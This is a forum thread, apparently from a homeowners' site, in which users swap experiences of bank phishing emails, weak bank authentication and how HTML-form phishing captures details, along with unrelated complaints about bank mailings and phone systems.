It used to be something really stupid like olb2.nationet.com it recently changed to
Dave Liquorice :
Best to use a relatively secure browser such a Google Chrome for your sensitive stuff. And for nothing else.
Plain text e-mail neatly side-steps that problem.
That would be why they keep issuing fixes then?
Not if the HTML page is just an attached file. It points to your hard disk :-)
"dennis@home" :
"relatively"
I had the same run in with Barclaycard "Secure" which has textbook vulnerabilities to a man-in-the-middle attack. The first time I saw it I mistook it for a browser hijack in a pop-up window (which basically it is). The forgeries of Barclaycard Secure are very good indeed but ask for more information that the real one - the entire password.
A lot of banks use some third party for their bulk customer emailing. This leaves you to guess whether they are genuine or not. And despite saying "we will never put links in our emails" they do :(
Paypal at least tries quite hard to do things more or less right with a specific salutation that is *always|* used in genuine emails.
Funniest one I ran into was a major player with two parallel nearly identical sites with https: capability but only one of them intended to be exposed externally and properly Verisigned. Somehow Google had indexed both and I landed on the one which was mismatched to its security certificate. I was seriously unimpressed.
Worse than that they sometimes cold call me and demand that *I* prove to them who I am. My response is tell me the first line of my address (and they won't because of data protection) we deadlock at that point.
The trouble with blacklisting is that smarthosts for major ISPs can and do end up on the certain blacklists after a botnet or Trojan affects some of their users. The phishing and spam experts already have more than enough honeypots to catch generic spam quickly.
It can even be automated for ones that match certain rules. What I object to is filling in webpages.
Even worse is when this is an automated system and you can't tell them that their security model is flawed.
But a decent ISP will get their machines off blacklists quickly and being a proper MTA will retry sending the queued messages or, if the recipient completely rejects(*) the message, bounce it back to the sender.
(*) Safer to say "temporary problem, call back later" rather an out and out rejection, spammers rarely retry, proper MTAs do.
If I load a file from the local disc with external links into my browser I and hover over those links the browser tells me the content of the href. Don't these, recent, all singin', all dancin', enchanced web experience, browsers do that?
A FORM statement is not a url. Its isnt a link. You cant 'hover over it'
Its just where you go when you push that submit button.
Don't these, recent, all singin', all dancin', enchanced
Of course, but it makes no difference. All the LINKS are to the genuine bank pages.
Or what javascript gets triggered as you change values in the fields and is whisked away via XHR before you even think about pressing the button.
There is no HREF underneath. You're clicking a button to submit a form. That doesn't show up in the status bar.
So don't even half-complete the form and think that, by not clicking the submit button, you've not sent anything, because you may well have.
I should also have said that the browser's response is therefore:
"Sorry Dave, I can't do that."
Ha lost the track of the thread, probably something to do with leaving for work at 0600 yesterday and not getting back 'till 2130 and getting up again at 0700 this morning.
B-)
I must watch that, ages since I did, got it on Bluray for Christmas.
I saw no sign of that, I have to say.
Capital One have a similar problem with their automated phone system. I used to have a credit card with them when I lived in the UK. When I moved to France I gave them my French address but they don't permit me to have a card any more due to being non-resident in the UK. Fair enough. But every few months they send me a letter in the post about something or other such as changes to their terms and conditions. This has gone on for over six years now. I haven't had a Capital One card now for over six years but they still keep sending me mail as though I'm a card holder. I tried to phone them to ask them to stop but it is impossible because their phone system insists I enter my card number - which has long since expired and I forgot 6 years ago. It is impossible to speak to anyone without entering that number. So complete deadlock. They keep sending me mailings about my zero balance account (no account number specified in their mailings) and I keep destroying and binning them.
Yes, I think there was none of that in the scripts recently received. But there's no reason it couldn't be like that.
Striking letters through "NOT KNOWN AT THIS ADDRESS" works eventually.
Be *very* careful if you have ever registered for any of the bank branded card protection services linked to one of your cards if you move house. For reasons of "data protection" your change of address sent to the credit card and bank is not shared with the same named card security firm (which is actually a third party provider). The upshot of this is at renewal a complete list of all your credit cards is sent to the address where you previously lived. Then you have to get them to admit that it is a third party provider and which one to sort it out!
I have had it happen to me and had a similar pacakage of stuff come to my new address and with a surprising name collision that suggested it might actually be identity fraud (ie addressed to another Mr Brown).
HomeOwnersHub website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.